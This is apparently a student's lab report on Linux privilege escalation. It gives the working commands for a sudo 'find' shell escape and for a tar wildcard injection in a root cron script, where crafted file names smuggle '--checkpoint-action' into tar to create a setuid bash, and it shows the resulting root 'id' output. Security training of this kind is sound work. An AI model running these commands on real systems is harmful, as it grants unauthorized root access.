==================================================
SESSION 23: ESCALATION PATH REPORT (LINUX)
Operator: Shatiqua Talley 
==================================================
MICRO-LAB (SUDO):
1. Command used to escalate via 'find': 
    sudo find . -exec /bin/sh -p \; -quit

DEEP DIVE (CRON):
Vulnerable Service Name / Mechanism:
1. Name of the root-owned script found:
   Cron Job executing root-owned script /usr/local/bin/backup.sh (tar wildcard expansion)
Path to the Writable Folder:
/home/limited_user/backups
2. The specific command inside that script that was vulnerable:
   tar -cf /tmp/backup.tar *
Payload / Exploit Commands:
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > runme.sh
touch ./"--checkpoint=1"
touch ./"--checkpoint-action=exec=sh runme.sh"
3. Final proof of root (output of 'id'):
   uid=1002(limited_user) gid=1003(limited_user) euid=0(root) 
egid=0(root) groups=0(root),1003(limited_user)
Proof of Execution (Linux Equivalent to NT AUTHORITY\SYSTEM):
Command: /tmp/rootbash -p -> id
